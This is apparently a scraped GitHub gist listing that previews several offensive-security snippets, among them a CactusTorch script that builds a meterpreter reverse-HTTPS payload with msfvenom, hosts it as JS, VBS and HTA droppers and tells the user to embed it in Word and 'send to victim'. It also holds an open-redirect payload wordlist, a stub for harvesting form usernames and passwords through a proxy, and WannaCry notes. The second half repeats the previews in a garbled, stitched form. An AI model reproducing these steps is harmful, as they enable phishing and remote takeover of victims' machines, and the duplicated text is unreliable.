Chandrapal Badshah Chan9390

## google-copy.js
javascript:d=document;b=d.createElement`textarea`;c=d.getSelection();b.textContent=[...d.querySelectorAll`div.r>a:first-child`].map(n=>n.href).join`\n`;d.body.appendChild(b);c.removeAllRanges();b.select();d.execCommand`copy`;d.body.removeChild(b)

## README.md

      
              2 files
            
          
              2 forks
            
          
              3 comments
            
          
              8 stars
            
          
                leonjza
                / README.md
            
            
              Last active
              September 11, 2022 11:29
            
              
                Custom socat with SSLv2 and SSLv3 support
              
          
    This script has moved to: https://github.com/leonjza/socat23

socat with sslv2 and sslv3 support

This script downloads and builds OpenSSL v1.0.2m and socat v1.7.3.2 in /usr/local/src. Once complete, a symlink at /usr/local/bin/socat-ssl23 is created so that you can run it with socat-ssl23.
install

Tested on Kali Linux:


## mimes.json
{
	"text/vnd.wap.wmlscript": "Wireless Markup Language Script (WMLScript)",
	"application/cu-seeme": "CU-SeeMe",
	"application/vnd.mobius.plc": "Mobius Management Systems - Policy Definition Language File",
	"application/vnd.dna": "New Moon Liftoff/DNA",
	"application/mathml+xml": "Mathematical Markup Language",
	"image/x-cmx": "Corel Metafile Exchange (CMX)",
	"application/vnd.oasis.opendocument.text": "OpenDocument Text",
	"application/vnd.ezpix-album": "EZPix Secure Photo Album",
	"application/xslt+xml": "XML Transformations",

## CactusTorchDDEAUTO.sh
git clone https://github.com/mdsecactivebreach/CACTUSTORCH.git && cd CACTUSTORCH
IP=`ip -4 addr show eth0 | grep -oP '(?<=inet\s)\d+(\.\d+){3}'`
msfvenom -p windows/meterpreter/reverse_https LHOST=$IP LPORT=443 -f raw -o payload.bin
PAYLOAD=$(cat payload.bin | base64 -w 0)
sed -i -e 's|var code = ".*|var code = "'$PAYLOAD'";|' CACTUSTORCH.js
sed -i -e 's|Dim code : code = ".*|Dim code : code = "'$PAYLOAD'"|g' CACTUSTORCH.vbs
sed -i -e 's|Dim code : code = ".*|Dim code : code = "'$PAYLOAD'"|g' CACTUSTORCH.hta
cp -t /var/www/html/ CACTUSTORCH.vbs CACTUSTORCH.js CACTUSTORCH.hta
service apache2 start
echo -e "\n\n\n\nOpen Microsoft Word and press CTRL+F9 and copy any of the payloads below in between the { } then save and send to victim.\n\nJS PAYLOAD:\n\

## open_redirect_wordlist.txt
/http://example.com
/%5cexample.com
/%2f%2fexample.com
/example.com/%2f%2e%2e
/http:/example.com
/?url=http://example.com&next=http://example.com&redirect=http://example.com&redir=http://example.com&rurl=http://example.com
/?url=//example.com&next=//example.com&redirect=//example.com&redir=//example.com&rurl=//example.com
/?url=/\/example.com&next=/\/example.com&redirect=/\/example.com
/redirect?url=http://example.com&next=http://example.com&redirect=http://example.com&redir=http://example.com&rurl=http://example.com
/redirect?url=//example.com&next=//example.com&redirect=//example.com&redir=//example.com&rurl=//example.com

## Native-Windows-Useragentss.txt
Invoke-WebRequest:
Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.14393.1066

System.Net.WebClient.DownloadFile():
None

Start-BitsTransfer:
Microsoft BITS/7.8

certutil.exe:

## Wannacrypt0r-FACTSHEET.md

      
              1 file
            
          
              158 forks
            
          
              267 comments
            
          
              711 stars
            
          
                rain-1
                / Wannacrypt0r-FACTSHEET.md
            
            
              Last active
              March 10, 2024 11:03
                — forked from Epivalent/Wannacrypt0r-FACTSHEET.md
            
          
    WannaCry|WannaDecrypt0r NSA-Cyberweapon-Powered Ransomware Worm


Virus Name: WannaCrypt, WannaCry, WanaCrypt0r, WCrypt, WCRY
Vector: All Windows versions before Windows 10 are vulnerable if not patched for MS-17-010. It uses EternalBlue MS17-010 to propagate.
Ransom: between $300 to $600. There is code to 'rm' (delete) files in the virus. Seems to reset if the virus crashes.
Backdooring: The worm loops through every RDP session on a system to run the ransomware as that user. It also installs the DOUBLEPULSAR backdoor. It corrupts shadow volumes to make recovery harder. (source: malwarebytes)
Kill switch: If the website www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com is up the virus exits instead of infecting the host. (source: malwarebytes). This domain has been sinkholed, stopping the spread of the worm. Will not work if proxied (source).

update: A minor variant of the viru

  
## #ShadowBrokers Processes
clocksvc.exe|*** PATROLWAGON ***|SAFE
help16.exe|*** SOMETHING YOU UPLOADED??? ***|SAFE
iexplorer.exe|*** UNITEDRAKE INSTALLER *** or RapidBlaster Virus|SAFE
msalgmon.exe|*** VALIDATOR ***|SAFE
mscache32.exe|*** FRIENDLY TOOL - Seek Help ***|SAFE
mscfg32.exe|*** UNITEDRAKE ***|SAFE
msdnsche.exe|*** FRIENDLY TOOL - Seek Help ***|SAFE
msmmc32.exe|*** FRIENDLY TOOL - Seek Help ***|SAFE
msntfs.exe|*** FRIENDLY TOOL - Seek Help ***|SAFE
msregstr.exe|*** VALIDATOR ***|SAFE

## empire_identifier.py
#!/usr/bin/env python3
from urllib.request import build_opener, HTTPSHandler
from http.client import RemoteDisconnected
from hashlib import sha256
from sys import argv, exit
from binascii import hexlify
import ssl

class NoException(Exception):
    pass

## dump_creds.py
# Print values from forms named username and password respectively

def response(flow):
    try:
        flow.request.headers.pop('Referer')
    except Exception:
        pass

    if flow.request.urlencoded_form:
        try:
	{
	"text/vnd.wap.wmlscript": "Wireless Markup Language Script (WMLScript)",
	"application/cu-seeme": "CU-SeeMe",
	"application/vnd.mobius.plc": "Mobius Management Systems - Policy Definition Language File",
	"application/vnd.dna": "New Moon Liftoff/DNA",
	"application/mathml+xml": "Mathematical Markup Language",
	"image/x-cmx": "Corel Metafile Exchange (CMX)",
	"application/vnd.oasis.opendocument.text": "OpenDocument Text",
	"application/vnd.ezpix-album": "EZPix Secure Photo Album",
	"application/xslt+xml": "XML Transformations",
	git clone https://github.com/mdsecactivebreach/CACTUSTORCH.git && cd CACTUSTORCH
	IP=`ip -4 addr show eth0 \| grep -oP '(?<=inet\s)\d+(\.\d+){3}'`
	msfvenom -p windows/meterpreter/reverse_https LHOST=$IP LPORT=443 -f raw -o payload.bin
	PAYLOAD=$(cat payload.bin \| base64 -w 0)
	sed -i -e 's\|var code = ".*\|var code = "'$PAYLOAD'";\|' CACTUSTORCH.js
	sed -i -e 's\|Dim code : code = ".*\|Dim code : code = "'$PAYLOAD'"\|g' CACTUSTORCH.vbs
	sed -i -e 's\|Dim code : code = ".*\|Dim code : code = "'$PAYLOAD'"\|g' CACTUSTORCH.hta
	cp -t /var/www/html/ CACTUSTORCH.vbs CACTUSTORCH.js CACTUSTORCH.hta
	service apache2 start
	echo -e "\n\n\n\nOpen Microsoft Word and press CTRL+F9 and copy any of the payloads below in between the { } then save and send to victim.\n\nJS PAYLOAD:\n\
	/http://example.com
	/%5cexample.com
	/%2f%2fexample.com
	/example.com/%2f%2e%2e
	/http:/example.com
	/?url=http://example.com&next=http://example.com&redirect=http://example.com&redir=http://example.com&rurl=http://example.com
	/?url=//example.com&next=//example.com&redirect=//example.com&redir=//example.com&rurl=//example.com
	/?url=/\/example.com&next=/\/example.com&redirect=/\/example.com
	/redirect?url=http://example.com&next=http://example.com&redirect=http://example.com&redir=http://example.com&rurl=http://example.com
	/redirect?url=//example.com&next=//example.com&redirect=//example.com&redir=//example.com&rurl=//example.com
	Invoke-WebRequest:
	Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.14393.1066

	System.Net.WebClient.DownloadFile():
	None

	Start-BitsTransfer:
	Microsoft BITS/7.8

	certutil.exe:
	clocksvc.exe\|* PATROLWAGON *\|SAFE
	help16.exe\|* SOMETHING YOU UPLOADED??? *\|SAFE
	iexplorer.exe\|* UNITEDRAKE INSTALLER * or RapidBlaster Virus\|SAFE
	msalgmon.exe\|* VALIDATOR *\|SAFE
	mscache32.exe\|* FRIENDLY TOOL - Seek Help *\|SAFE
	mscfg32.exe\|* UNITEDRAKE *\|SAFE
	msdnsche.exe\|* FRIENDLY TOOL - Seek Help *\|SAFE
	msmmc32.exe\|* FRIENDLY TOOL - Seek Help *\|SAFE
	msntfs.exe\|* FRIENDLY TOOL - Seek Help *\|SAFE
	msregstr.exe\|* VALIDATOR *\|SAFE
	#!/usr/bin/env python3
	from urllib.request import build_opener, HTTPSHandler
	from http.client import RemoteDisconnected
	from hashlib import sha256
	from sys import argv, exit
	from binascii import hexlify
	import ssl

	class NoException(Exception):
	pass
	# Print values from forms named username and password respectively

	def response(flow):
	try:
	flow.request.headers.pop('Referer')
	except Exception:
	pass

	if flow.request.urlencoded_form:
	try: